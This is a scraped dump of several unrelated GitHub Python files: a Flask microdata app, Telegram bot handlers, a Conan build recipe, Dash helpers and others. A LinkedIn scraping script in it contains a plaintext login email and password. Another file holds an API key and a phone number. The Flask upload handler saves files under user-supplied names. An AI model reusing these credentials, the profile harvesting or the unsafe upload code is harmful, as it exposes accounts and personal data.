fo.write(text)\n\n files = {\n 'data':open(\"download.txt\",'rb'),\n }\n\n apiURL = \"http://lindat.mff.cuni.cz/services/nametag/api/recognize\"\n response = requests.post(apiURL,files = files)\n NametagResponse = response.json()\n\n textData = (str(NametagResponse))\n clearedText = delete(textData)\n replacedText = replace(clearedText)\n\n with open('downloadText.txt', 'w', encoding='utf-8') as fo:\n fo.write(replacedText)\n\n return render_template(\"home.html\", form=form, text=replacedText)\n\n@app.route('/upload', methods = ['POST', 'GET']) \ndef upload(): \n\n if request.method == 'POST': \n f = request.files['file']\n f.save(f.filename) \n global name\n name = f.filename\n\n checkValues = (request.form.getlist('checkbox'))\n uploadfile = open(name, \"r\", encoding='utf-8')\n soup = BeautifulSoup(uploadfile, features = \"html.parser\")\n values = soup.find_all(checkValues)\n dataToSend = \"\"\n for heading in values:\n dataToSend = dataToSend + heading.text.strip() + \";\"\n \n with open('dataFile.txt', 'w', encoding='utf-8') as fo:\n fo.write(dataToSend)\n\n files = {\n 'data':open(\"dataFile.txt\",'rb'),\n }\n\n apiURL = \"http://lindat.mff.cuni.cz/services/nametag/api/recognize\"\n response = requests.post(apiURL,files = files)\n NametagResponse = response.text\n\n clearedText = delete(NametagResponse)\n replacedText = replace(clearedText)\n\n responseList = list(replacedText.split(';'))\n responseList.pop()\n\n for i, value in enumerate(values):\n value.string.replace_with(responseList[i])\n\n with open('modified.html', 'w', encoding='utf-8') as fo:\n fo.write(soup.prettify(formatter=None))\n\n return render_template(\"potvrdenie.html\", nazov = name)\n\ndef delete(deletetext):\n\n before = deletetext.partition(\"\") \n deletetext = deletetext.replace(before[0],\"\")\n deletetext = re.sub(r'|||',\"\",deletetext)\n deletetext = deletetext.replace(\"\\\\\", \"\").replace(\"[\", \"\").replace(\"]\", \"\").replace(\"'\", \"\").replace(\"}\", \"\")\n return deletetext\n\ndef replace(replacetext):\n\n replacetext = replacetext.replace('','')\n replacetext = replacetext.replace('','')\n replacetext = replacetext.replace('','')\n replacetext = replacetext.replace('','')\n replacetext = replacetext.replace('','')\n replacetext = replacetext.replace('','')\n replacetext = replacetext.replace('','')\n replacetext = replacetext.replace('','')\n replacetext = replacetext.replace('',' ')\n replacetext = replacetext.replace('','')\n\n return replacetext\n\n@app.route('/downloadtext') \ndef downloadtext():\n\n return send_file(\"downloadText.txt\", as_attachment=True)\n\n@app.route('/download') \ndef download():\n\n return send_file(\"modified.html\", as_attachment=True)\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n","repo_name":"VDominik/MicrodataRecognizer","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10294473376","text":"# -*- coding:utf-8 -*-\n# @Time:2020/7/30 15:34\n# @Author:martin\n# @File:phone.py\nimport requests\n# key = 63a77489d2c51d26b4031e344b4f0050\nclass Phone(object):\n\n def phone_location(self, phone, key):\n url = 'http://apis.juhe.cn/mobile/get'\n par = {\n \"phone\": phone,\n \"key\": key\n\n }\n r = requests.get(url=url,params=par)\n return r\n\nif __name__ == '__main__':\n p = Phone()\n r = p.phone_location(\"13979296069\",\"63a77489d2c51d26b4031e344b4f0050\")\n print(r.text)","repo_name":"martin-deng-ce/interface","sub_path":"phone.py","file_name":"phone.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"39040542254","text":"from aiogram import types, Dispatcher\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.dispatcher.filters import Text\nfrom aiogram.dispatcher.filters.state import State, StatesGroup\n\nfrom database.bot_db import sql_command_insert\nfrom keyboards import client_kb\nfrom uuid import uuid4\nfrom config import ADMINS\n\n\nclass FSMAdmin(StatesGroup):\n id1 = State()\n name = State()\n age = State()\n direction = State()\n group = State()\n submit = State()\n\n\nasync def fsm_start(message: types.Message):\n if message.chat.type == \"private\" and message.chat.id in ADMINS:\n await FSMAdmin.id1.set()\n await message.answer(\"Your id is ready!\", reply_markup=client_kb.cancel_markup)\n else:\n await message.answer(\"Write to the group!\")\n\n\nasync def load_id(message: types.Message, state: FSMContext):\n async with state.proxy() as data:\n data['id'] = str(uuid4())\n await FSMAdmin.next()\n await message.answer(\"Enter your name: \", reply_markup=client_kb.cancel_markup)\n\n\nasync def load_name(message: types.Message, state: FSMContext):\n name = message.text.strip()\n if not name.isalpha():\n await message.answer(\"Your name should contain only letters\")\n else:\n async with state.proxy() as data:\n data['username'] = message.from_user.username\n data['name'] = name\n await FSMAdmin.next()\n await message.answer(\"Enter your age: \")\n\n\nasync def load_age(message: types.Message, state: FSMContext):\n if not message.text.isdigit():\n await message.answer(\"Write in numbers!\")\n elif int(message.text) < 15 or int(message.text) > 40:\n await message.answer(\"Your age should be a number between 15 and 40\")\n else:\n async with state.proxy() as data:\n data['age'] = message.text\n await FSMAdmin.next()\n await message.answer(\"What direction are you studying?: \", reply_markup=client_kb.direction_markup)\n\n\nasync def load_direction(message: types.Message, state: FSMContext):\n async with state.proxy() as data:\n data['direction'] = message.text\n await FSMAdmin.next()\n await message.answer(\"What group are you in?: \", reply_markup=client_kb.cancel_markup)\n\n\nasync def load_group(message: types.Message, state: FSMContext):\n async with state.proxy() as data:\n data['group'] = message.text\n await message.answer(f\"{data['name']} {data['age']} {data['group']} {data['direction']}\\n\"\n f\"ID: {data['id']}\")\n await FSMAdmin.next()\n await message.answer(\"Is everything right?\", reply_markup=client_kb.submit_markup)\n\n\nasync def submit(message: types.Message, state: FSMContext):\n if message.text == \"yes\":\n await sql_command_insert(state)\n await message.answer(\"You are registered!\")\n await state.finish()\n elif message.text == \"no\":\n await state.finish()\n else:\n await message.answer(\"Please answer 'yes' or 'no'\")\n\n\nasync def cansel_reg(message: types.Message, state: FSMContext):\n current_state = await state.get_state()\n if current_state:\n await state.finish()\n await message.answer(\"You completed the operation\")\n await message.answer(\"canceled✔️️\")\n\n\ndef register_handlers_fsm_anketa(dp: Dispatcher):\n dp.register_message_handler(cansel_reg, state='*', commands=['cancel'])\n dp.register_message_handler(cansel_reg,\n Text(equals=\"cancel\", ignore_case=True), state='*')\n\n dp.register_message_handler(fsm_start, commands=['reg'])\n dp.register_message_handler(load_id, state=FSMAdmin.id1)\n dp.register_message_handler(load_name, state=FSMAdmin.name)\n dp.register_message_handler(load_age, state=FSMAdmin.age)\n dp.register_message_handler(load_direction, state=FSMAdmin.direction)\n dp.register_message_handler(load_group, state=FSMAdmin.group)\n dp.register_message_handler(submit, state=FSMAdmin.submit)\n\n","repo_name":"ermeks6/Oliver","sub_path":"handlers/fsm_anketa.py","file_name":"fsm_anketa.py","file_ext":"py","file_size_in_byte":3942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21865559441","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nhttps://nlp100.github.io/ja/ch01.html\n\n01. 「パタトクカシーー」\n「パタトクカシーー」という文字列の1,3,5,7文字目を取り出して連結した文字列を得よ.\n\"\"\"\n\n\nstr01=\"パタトクカシーー\"\n\nstr02=str01[::2]\n\nprint(str02)\n\n\n\n","repo_name":"gotzy/nlp100_workout","sub_path":"nlp_01.py","file_name":"nlp_01.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31942969295","text":"import os\n\nfrom conan import ConanFile\nfrom conan.tools.build import check_min_cppstd, cross_building\nfrom conan.tools.cmake import CMake, CMakeDeps, CMakeToolchain, cmake_layout\nfrom conan.tools.env import VirtualRunEnv, VirtualBuildEnv\nfrom conan.tools.files import apply_conandata_patches, copy, export_conandata_patches, get, replace_in_file, rmdir\nfrom conan.tools.microsoft import check_min_vs, is_msvc\nfrom conan.tools.scm import Version\nfrom conan.errors import ConanInvalidConfiguration\n\n# Load the generated component dependency information.\n#\n# `google-cloud-cpp` has well over 200 components. Conan cannot use the CMake\n# files generated by `google-cloud-cpp`. Manually maintaining this dependency\n# information is error prone and fairly tedious. A helper script in this\n# directory reproduces the algorithms used by `google-cloud-cpp` to generate its\n# dependency information. With each new revision of `google-cloud-cpp` the\n# script will be used to generate a new file with the component dependency\n# information. The expectation is that maintaining this script will be easier\n# than writing long lists of dependencies by hand.\nimport components_2_5_0\nimport components_2_12_0\n\nrequired_conan_version = \">=1.56.0\"\n\n\nclass GoogleCloudCppConan(ConanFile):\n name = \"google-cloud-cpp\"\n description = \"C++ Client Libraries for Google Cloud Services\"\n license = \"Apache-2.0\"\n topics = (\n \"google\",\n \"cloud\",\n \"google-cloud-storage\",\n \"google-cloud-platform\",\n \"google-cloud-pubsub\",\n \"google-cloud-spanner\",\n \"google-cloud-bigtable\",\n )\n homepage = \"https://github.com/googleapis/google-cloud-cpp\"\n url = \"https://github.com/conan-io/conan-center-index\"\n package_type = \"library\"\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n options = {\"shared\": [True, False], \"fPIC\": [True, False]}\n default_options = {\"shared\": False, \"fPIC\": True}\n exports = [\"components_2_5_0.py\",\n \"components_2_12_0.py\",\n ]\n\n short_paths = True\n\n _GA_COMPONENTS = {\n '2.5.0': components_2_5_0.COMPONENTS,\n '2.12.0': components_2_12_0.COMPONENTS,\n }\n _PROTO_COMPONENTS = {\n '2.5.0': components_2_5_0.PROTO_COMPONENTS,\n '2.12.0': components_2_12_0.PROTO_COMPONENTS,\n }\n _PROTO_COMPONENT_DEPENDENCIES = {\n \"2.5.0\": components_2_5_0.DEPENDENCIES,\n \"2.12.0\": components_2_12_0.DEPENDENCIES,\n }\n # Some components require custom dependency definitions.\n _REQUIRES_CUSTOM_DEPENDENCIES = {\n \"bigquery\", \"bigtable\", \"iam\", \"pubsub\", \"spanner\", \"storage\",\n }\n\n def export_sources(self):\n export_conandata_patches(self)\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n del self.options.fPIC\n\n def configure(self):\n if self.options.shared:\n self.options.rm_safe(\"fPIC\")\n self.options[\"protobuf\"].shared = True\n self.options[\"grpc\"].shared = True\n\n def validate(self):\n # As-of 2022-03, google-cloud-cpp only supports \"Visual Studio >= 2019\",\n # and Visual Studio < 2019 is out of mainline support.\n # The wikipedia page says this maps to 192* for the MSVC version:\n # https://en.wikipedia.org/wiki/Microsoft_Visual_C%2B%2B\n check_min_vs(self, \"192\")\n if is_msvc(self) and self.info.options.shared:\n raise ConanInvalidConfiguration(f\"{self.ref} shared not supported by Visual Studio\")\n\n if hasattr(self, \"settings_build\") and cross_building(self):\n raise ConanInvalidConfiguration(\n \"Recipe not prepared for cross-building (yet)\"\n )\n\n if self.version not in self._GA_COMPONENTS:\n raise ConanInvalidConfiguration(\n \"The components are unknown for version %s\" % self.version\n )\n\n if self.version not in self._PROTO_COMPONENTS:\n raise ConanInvalidConfiguration(\n \"The proto components are unknown for version %s\" % self.version\n )\n\n if self.version not in self._PROTO_COMPONENT_DEPENDENCIES:\n raise ConanInvalidConfiguration(\n \"The inter-component dependencies are unknown for version %s\" % self.version\n )\n\n if (\n self.settings.compiler == \"clang\"\n and Version(self.settings.compiler.version) < \"6.0\"\n ):\n raise ConanInvalidConfiguration(\"Clang version must be at least 6.0.\")\n\n if self.settings.compiler.cppstd:\n check_min_cppstd(self, 14)\n\n if (\n self.settings.compiler == \"gcc\"\n and Version(self.settings.compiler.version) < \"5.4\"\n ):\n raise ConanInvalidConfiguration(\"Building requires GCC >= 5.4\")\n\n if self.info.options.shared and \\\n (not self.dependencies[\"protobuf\"].options.shared or \\\n not self.dependencies[\"grpc\"].options.shared):\n raise ConanInvalidConfiguration(\n \"If built as shared, protobuf, and grpc must be shared as well.\"\n \" Please, use `protobuf/*:shared=True`, and `grpc/*:shared=True`.\")\n\n def layout(self):\n cmake_layout(self, src_folder=\"src\")\n\n def source(self):\n get(self, **self.conan_data[\"sources\"][self.version], destination=self.source_folder, strip_root=True)\n\n def requirements(self):\n self.requires(\"protobuf/3.21.9\", transitive_headers=True)\n self.requires(\"grpc/1.50.1\", transitive_headers=True)\n self.requires(\"nlohmann_json/3.10.0\")\n self.requires(\"crc32c/1.1.1\")\n self.requires(\"abseil/20220623.0\", transitive_headers=True)\n self.requires(\"libcurl/7.88.1\")\n self.requires(\"openssl/[>=1.1 <4]\")\n self.requires(\"zlib/1.2.13\")\n\n def build_requirements(self):\n # For the grpc-cpp-plugin executable\n self.tool_requires(\"grpc/1.50.1\")\n\n def generate(self):\n tc = CMakeToolchain(self)\n tc.variables[\"BUILD_TESTING\"] = False\n tc.variables[\"GOOGLE_CLOUD_CPP_ENABLE_MACOS_OPENSSL_CHECK\"] = False\n tc.variables[\"GOOGLE_CLOUD_CPP_ENABLE\"] = \",\".join(self._components())\n tc.generate()\n VirtualRunEnv(self).generate(scope=\"build\")\n deps = CMakeDeps(self)\n deps.generate()\n\n def _patch_sources(self):\n apply_conandata_patches(self)\n # This was informed by comments in the grpc port. On macOS `Make` will\n # run commands via `/bin/sh`. `/bin/sh` is subject to System Integrity\n # Protections. In particular, the system will purge the DYLD_LIBRARY_PATH\n # enviroment variables:\n # https://developer.apple.com/library/archive/documentation/Security/Conceptual/System_Integrity_Protection_Guide/RuntimeProtections/RuntimeProtections.html\n settings_build = getattr(self, \"settings_build\", self.settings)\n if settings_build.os == \"Macos\":\n replace_in_file(self, os.path.join(self.source_folder, \"cmake/CompileProtos.cmake\"),\n \"$\",\n '${CMAKE_COMMAND} -E env \"DYLD_LIBRARY_PATH=$ENV{DYLD_LIBRARY_PATH}\" $')\n\n def build(self):\n self._patch_sources()\n cmake = CMake(self)\n cmake.configure()\n cmake.build()\n\n def _generate_proto_requires(self, component):\n deps = self._PROTO_COMPONENT_DEPENDENCIES.get(self.version, dict())\n return deps.get(component, [])\n\n _SKIPPED_COMPONENTS = {\n # Some protos do not compile due to inconvenient system macros clashing\n # with proto enum values. Protobuf can workaround these problems, but\n # the current version in Conan index (protobuf/3.21.4) do not contain\n # the fixes for these cases.\n # TODO - review after protobuf >= 4.23.x\n 'asset',\n 'channel',\n 'storagetransfer',\n # TODO - certificatemanager crashes the gRPC code generator. Add it back\n # after gRPC >= 1.53.x\n 'certificatemanager',\n }\n\n def _components(self):\n result = self._GA_COMPONENTS.get(self.version, []).copy()\n for c in self._SKIPPED_COMPONENTS:\n result.remove(c)\n # TODO - these do not build on Android due to conflicts between OS\n # macros and Proto enums. Revisit after Protobuf >= 4.23.x\n if self.settings.os == \"Android\":\n result.remove('accesscontextmanager')\n result.remove('talent')\n return result\n\n def _proto_components(self):\n result = self._PROTO_COMPONENTS.get(self.version, []).copy()\n for c in self._SKIPPED_COMPONENTS:\n result.remove(c + '_protos')\n # TODO - these do not build on Android due to conflicts between OS\n # macros and Proto enums. Revisit after Protobuf >= 4.23.x\n if self.settings.os == \"Android\":\n result.remove('accesscontextmanager_protos')\n result.remove('talent_protos')\n return result\n\n def package(self):\n copy(self, \"LICENSE\", src=self.source_folder, dst=os.path.join(self.package_folder, \"licenses\"))\n cmake = CMake(self)\n cmake.install()\n rmdir(self, path=os.path.join(self.package_folder, \"lib\", \"cmake\"))\n rmdir(self, path=os.path.join(self.package_folder, \"lib\", \"pkgconfig\"))\n\n def _add_proto_component(self, component):\n self.cpp_info.components[component].requires = self._generate_proto_requires(component)\n self.cpp_info.components[component].libs = [f\"google_cloud_cpp_{component}\"]\n self.cpp_info.components[component].names[\"pkg_config\"] = f\"google_cloud_cpp_{component}\"\n\n def _add_grpc_component(self, component, protos, extra=None):\n SHARED_REQUIRES=[\"grpc_utils\", \"common\", \"grpc::grpc++\", \"grpc::_grpc\", \"protobuf::libprotobuf\", \"abseil::absl_memory\"]\n self.cpp_info.components[component].requires = (extra or []) + [protos] + SHARED_REQUIRES\n self.cpp_info.components[component].libs = [f\"google_cloud_cpp_{component}\"]\n self.cpp_info.components[component].names[\"pkg_config\"] = f\"google_cloud_cpp_{component}\"\n\n def package_info(self):\n self.cpp_info.components[\"common\"].requires = [\"abseil::absl_any\", \"abseil::absl_flat_hash_map\", \"abseil::absl_memory\", \"abseil::absl_optional\", \"abseil::absl_time\"]\n self.cpp_info.components[\"common\"].libs = [\"google_cloud_cpp_common\"]\n self.cpp_info.components[\"common\"].names[\"pkg_config\"] = \"google_cloud_cpp_common\"\n\n self.cpp_info.components[\"rest_internal\"].requires = [\"common\", \"libcurl::libcurl\", \"openssl::ssl\", \"openssl::crypto\", \"zlib::zlib\"]\n self.cpp_info.components[\"rest_internal\"].libs = [\"google_cloud_cpp_rest_internal\"]\n self.cpp_info.components[\"rest_internal\"].names[\"pkg_config\"] = \"google_cloud_cpp_common\"\n\n # A small number of gRPC-generated stubs are used directly in the common components\n # shared by all gRPC-based libraries. These must be defined without reference to `grpc_utils`.\n GRPC_UTILS_REQUIRED_PROTOS={\"iam_protos\", \"longrunning_operations_protos\", \"rpc_error_details_protos\", \"rpc_status_protos\"}\n for component in GRPC_UTILS_REQUIRED_PROTOS:\n self._add_proto_component(component)\n\n self.cpp_info.components[\"grpc_utils\"].requires = list(GRPC_UTILS_REQUIRED_PROTOS) + [\"common\", \"abseil::absl_function_ref\", \"abseil::absl_memory\", \"abseil::absl_time\", \"grpc::grpc++\", \"grpc::_grpc\"]\n self.cpp_info.components[\"grpc_utils\"].libs = [\"google_cloud_cpp_grpc_utils\"]\n self.cpp_info.components[\"grpc_utils\"].names[\"pkg_config\"] = \"google_cloud_cpp_grpc_utils\"\n\n for component in self._proto_components():\n if component not in GRPC_UTILS_REQUIRED_PROTOS:\n self._add_proto_component(component)\n\n # Interface libraries for backwards compatibility\n self.cpp_info.components[\"dialogflow_es_protos\"].requires = [\"cloud_dialogflow_v2_protos\"]\n self.cpp_info.components[\"logging_type_protos\"].requires = [\"logging_type_type_protos\"]\n self.cpp_info.components[\"speech_protos\"].requires = [\"cloud_speech_protos\"]\n self.cpp_info.components[\"texttospeech_protos\"].requires = [\"cloud_texttospeech_protos\"]\n self.cpp_info.components[\"trace_protos\"].requires = [\n \"devtools_cloudtrace_v2_trace_protos\",\n \"devtools_cloudtrace_v2_tracing_protos\",\n ]\n\n for component in self._components():\n # bigquery proto library predates the adoption of more consistent naming\n if component == 'bigquery':\n self._add_proto_component(\"cloud_bigquery_protos\")\n self._add_grpc_component(component, \"cloud_bigquery_protos\")\n continue\n if component == 'dialogflow_es':\n self._add_proto_component(\"cloud_dialogflow_v2_protos\")\n self._add_grpc_component(component, \"cloud_dialogflow_v2_protos\")\n continue\n # `storage` is the only component that does not depend on a matching `*_protos` library\n protos=f\"{component}_protos\"\n if component in self._REQUIRES_CUSTOM_DEPENDENCIES:\n continue\n self._add_grpc_component(component, protos)\n\n self._add_grpc_component(\"bigquery\", \"cloud_bigquery_protos\")\n self._add_grpc_component(\"bigtable\", \"bigtable_protos\")\n self._add_grpc_component(\"iam\", \"iam_protos\")\n self._add_grpc_component(\"pubsub\", \"pubsub_protos\", [\"abseil::absl_flat_hash_map\"])\n self._add_grpc_component(\"spanner\", \"spanner_protos\", [\"abseil::absl_fixed_array\", \"abseil::absl_numeric\", \"abseil::absl_strings\", \"abseil::absl_time\"])\n\n self.cpp_info.components[\"storage\"].requires = [\"rest_internal\", \"common\", \"nlohmann_json::nlohmann_json\", \"abseil::absl_memory\", \"abseil::absl_strings\", \"abseil::absl_str_format\", \"abseil::absl_time\", \"abseil::absl_variant\", \"crc32c::crc32c\", \"libcurl::libcurl\", \"openssl::ssl\", \"openssl::crypto\", \"zlib::zlib\"]\n self.cpp_info.components[\"storage\"].libs = [\"google_cloud_cpp_storage\"]\n self.cpp_info.components[\"storage\"].names[\"pkg_config\"] = \"google_cloud_cpp_storage\"\n","repo_name":"conan-io/conan-center-index","sub_path":"recipes/google-cloud-cpp/2.x/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":14283,"program_lang":"python","lang":"en","doc_type":"code","stars":835,"dataset":"github-code","pt":"77"} +{"seq_id":"41800307467","text":"import dash_html_components as html\nimport dash_core_components as dcc\n\n\ndef Header(app):\n return html.Div([get_header(app), html.Br([]), get_menu()])\n\n\ndef get_header(app):\n header = html.Div(\n [\n html.Div(\n [\n html.Img(\n src=app.get_asset_url(\"columbia.jpg\"),\n className=\"logo\",\n )\n ],\n className=\"row\",\n ),\n html.Div(\n [\n html.Div(\n [html.H5(\"Reinforcement Learning for Customer Interaction\")],\n className=\"seven columns main-title\",\n )\n ],\n className=\"twelve columns\",\n style={\"padding-left\": \"0\"},\n ),\n ],\n className=\"row\",\n )\n return header\n\n\ndef get_menu():\n menu = html.Div(\n [\n dcc.Link(\n \"Overview\",\n href=\"/dash-financial-report/overview\",\n className=\"tab first\",\n ),\n dcc.Link(\n \"Direct RL\",\n href=\"/dash-financial-report/DirectRL\",\n className=\"tab\",\n ),\n dcc.Link(\n \"Indirect RL\",\n href=\"/dash-financial-report/IndirectRL\",\n className=\"tab\",\n ),\n dcc.Link(\n \"Semidirect RL\",\n href=\"/dash-financial-report/SemidirectRL\",\n className=\"tab\",\n ),\n ],\n className=\"row all-tabs\",\n )\n return menu\n\n\ndef make_dash_table(df):\n \"\"\" Return a dash definition of an HTML table for a Pandas dataframe \"\"\"\n table = []\n for index, row in df.iterrows():\n html_row = []\n for i in range(len(row)):\n html_row.append(html.Td([row[i]]))\n table.append(html.Tr(html_row))\n return table\n","repo_name":"Sapphirine/202005-16-RL_for_Customer_Interaction","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1125853119","text":"# needs to be customized for each model type\nimport os\nimport sys\nimport pandas as pd\nfrom src.exception import CustomException\nfrom src.utils import load_object\n\nclass PredictPipeline:\n def __init__(self):\n pass\n\n def predict(self,data):\n try:\n print('loading model and preprocessor')\n model_path=os.path.join(\"artifacts\",\"model.pkl\")\n preprocessor_path=os.path.join('artifacts','proprocessor.pkl')\n print(\"Before Loading\")\n model=load_object(file_path=model_path)\n preprocessor=load_object(file_path=preprocessor_path)\n print(\"After Loading\")\n data_scaled=preprocessor.transform(data)\n preds=model.predict(data_scaled)\n probs =model.predict_proba(data_scaled)[:,1]\n\n return preds, probs\n \n except Exception as e:\n raise CustomException(e,sys)\n","repo_name":"rjwdata/poc-early-warning","sub_path":"src/pipeline/predict_pipeline.py","file_name":"predict_pipeline.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10954300786","text":"import math\n\nfrom .triangle_class import TriangleClass\n\n\nclass EquilateralTriangleClass(TriangleClass):\n def __init__(self, a_side, b_side, angle):\n super().__init__(a_side, b_side, angle)\n self.a_side = a_side\n\n def perimeter_calculation(self):\n self.perimeter = self.a_side * 3\n\n def area_calculation(self):\n try:\n a = self.a_side\n h = math.sqrt(pow(a, 2) - (pow(a, 2) / 4))\n self.area = (1 / 2) * a * h\n except ValueError:\n self.area = \"Ошибка вычисления\"\n","repo_name":"GeorgiyDemo/FA","sub_path":"Course_I/Алгоритмы Python/Part2/семинары/pract2/задание/modules/task8/equilateral_triangle_class.py","file_name":"equilateral_triangle_class.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"77"} +{"seq_id":"35360399049","text":"from time import sleep\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\n\ndriver = webdriver.Chrome('/mnt/d/Chrome_Driver/chromedriver.exe')\n #for bash terminal: /mnt/d/Chrome_Driver/chromedriver.exe\n #for cmd terminal: D:\\Chrome_Driver\\chromedriver.exe\nsleep(2)\ndriver.get('https://www.linkedin.com/login?trk=guest_homepage-basic_nav-header-signin')\nsleep(3)\n\n#username authentication\nusername = driver.find_element_by_id('username')\nusername.send_keys('omiakif@gmail.com')\nsleep(0.5)\n\n#password authentication\npassword = driver.find_element_by_id('password')\npassword.send_keys('m911springfieldm911')\nsleep(0.5)\n\n#login\nlog_in_button = driver.find_element_by_xpath('//*[@type=\"submit\"]')\nlog_in_button.click()\nsleep(4)\n\n\ndriver.execute_script(\"window.open('https://www.linkedin.com/search/results/people/?origin=DISCOVER_FROM_SEARCH_HOME');\")\nsleep(3)\n\ndriver.close()\ndriver.switch_to.window(driver.window_handles[-1])\n\n#all_filters = driver.find_element_by_xpath('//*[@id=\"ember272\"]/span')\n#all_filters = driver.find_element_by_link_text('All Filters')\n\nsearch = driver.find_element_by_xpath('//*[@id=\"ember33\"]/input')\nsearch.send_keys('East West University')\nsearch.send_keys(Keys.ENTER)\n\n#//*[@id=\"ember33\"]/input\n# class == search-filters-bar__all-filters flex-shrink-zero mr3 artdeco-button artdeco-button--muted artdeco-button--2 artdeco-button--tertiary ember-view\n\ndef find_odds(num_ber):\n if not num_ber:\n return []\n if num_ber[0]%2 == 1:\n return [num_ber[0]] + find_odds(num_ber[1:])\n return find_odds(num_ber[1:])\n\ndef find_people(li):\n for i in range(len(li)):\n odd_find = find_odds(range(len(linkedin_urls)))\n l = linkedin_urls[odd_find[i-len(li)]].get_attribute('href')\n #l = linkedin_urls[i].get_attribute('href')\n driver.execute_script(\"window.open(arguments[0]);\", l)\n sleep(3)\n driver.switch_to.window(driver.window_handles[-1])\n \n #driver.get(linkedin_urls[i])\n sleep(5)\n \n driver.execute_script(\"window.scrollTo(0,811.495);\")\n sleep(0.5)\n driver.execute_script(\"window.scrollTo(811.495,1622.99);\")\n sleep(0.5)\n driver.execute_script(\"window.scrollTo(1622.99,2434.485);\")\n sleep(0.5)\n driver.execute_script(\"window.scrollTo(2434.485,3254.98);\")\n sleep(0.5)\n\n #sel = Selector(text=driver.page_source)\n\n #to match against the provided name\n #re_name = name_1[i]\n\n name_2 = driver.find_element_by_css_selector('li.inline.t-24.t-black.t-normal.break-words')\n name = name_2.get_attribute('innerHTML')\n if name:\n name = name.strip()\n\n wo_rk = driver.find_element_by_css_selector('h2.mt1.inline-block.t-18.t-black.t-normal')\n work = wo_rk.get_attribute('innerHTML')\n if work:\n work = work.strip()\n\n \n #current position/work\n #c_position = current_pos_txt[i]\n #To find if the candidate has any details of his past\n\n if current_pos_txt == \"\":\n print(\"As per work\")\n \n #degree\n\n deg_ree = driver.find_element_by_css_selector('span.pv-entity__comma-item')\n degree = deg_ree.get_attribute('innerHTML')\n if degree:\n degree = degree.strip()\n\n #replaced with innerHTML\n #education = [deg.text for deg in deg_ree] \n\n #degree = sel.css('span.pv-entity__comma-item').extract_first()\n #if degree:\n # degree = degree.strip()\n \n #pv-entity__school-name t-16 t-black t-bold\n\n #university = sel.css('h3.pv-entity__school-name.t-16.t-black.t-bold')\n\n uni_ver = driver.find_element_by_css_selector('h3.pv-entity__school-name.t-16.t-black.t-bold')\n university = uni_ver.get_attribute('innerHTML')\n if university:\n university = university.strip()\n\n #year\n ye_ars = driver.find_element_by_tag_name('time') \n years = [y.text for y in ye_ars] \n\n #url of the \n link_url = driver.current_url\n\n print('\\n')\n print('Name: ' + name)\n print('Work: ' + work)\n print('Degree: ' + degree)\n print('Years ' + str(years))\n print('URL ' + link_url)\n\n driver.close()\n driver.switch_to_window(driver.window_handles[-1])\n\n return name, work, degree, years, link_url\n\n\n\n# Find the object to interact with.\n#driver.find_element_by_class_name(\"foo\").click()\n\n# New tabs will be the last object in window_handles\n#driver.switch_to.window(driver.window_handles[-1])\n\n# close the tab\n#driver.close()\n\n#search_query = driver.find_element_by_name('q')\n#search_query.send_keys('site:linkedin.com/in/ AND \"East West University\" AND \"Bangladesh\"')\n#sleep(0.5)\n\n#search_query.submit()\n#sleep(3)\n\n\ncounter = 1\n#driver.find_element_by_tag_name('body').send_keys(Keys.CONTROL + Keys.HOME)\n\n#actionChains = ActionChains(driver)\n\nwhile True:\n driver.execute_script(\"window.scrollTo(0,557);\")\n sleep(0.5)\n driver.execute_script(\"window.scrollTo(557,1114);\")\n sleep(0.5)\n driver.execute_script(\"window.scrollTo(1114,1671);\")\n sleep(0.5)\n driver.execute_script(\"window.scrollTo(1671,2229);\")\n sleep(0.5)\n\n li = driver.find_elements_by_class_name('span.name.actor-name')\n\n linkedin_urls = driver.find_elements_by_css_selector('a.search-result__result-link.ember-view')\n current_pos = driver.find_elements_by_css_selector('p.search-result__snippets.mt2.t-12.t-black--light.t-normal')\n \n #name_1 = [url.text for url in linkedin_urls]\n current_pos_txt = [ul.text for ul in current_pos]\n\n\n #f = open('output.html', 'w')\n #driver.page_source = f\n\n\n sleep(5)\n\n #driver.close()\n\n\n #a = driver.page_source\n #file = open('ist.html', 'w', encoding='utf-8')\n #file.write(a)\n #file.close()\n\n counter+=1\n\n driver.get(\"https://www.linkedin.com/search/results/people/?keywords=East%%20West%%20University&origin=GLOBAL_SEARCH_HEADER&page=%d\" % counter)\n\n\n if linkedin_urls[0] == linkedin_urls[-1]:\n break\n\n sleep(0.5)\n\n\nsleep(0.5)\n\ndriver.quit()","repo_name":"omi-akif/My_Codes","sub_path":"Python/Python Projects/lin-in/links.py","file_name":"links.py","file_ext":"py","file_size_in_byte":6141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36366674177","text":"from .models import Khata_book\n\n\ndef grand_total(datas):\n amount = 0\n for data in datas:\n amount += data.total_amount\n return amount\n\n\ndef getClientList(user=None, client=None):\n user_data = Khata_book.objects.filter(user=user)\n if client is None:\n entries = user_data.values('client_name').distinct()\n all_clients = {}\n for entry in entries:\n # gives arranged lists of same clients\n name = list(entry.values())\n # gives query sets of that particular client, so that we can display it further\n data_sets = 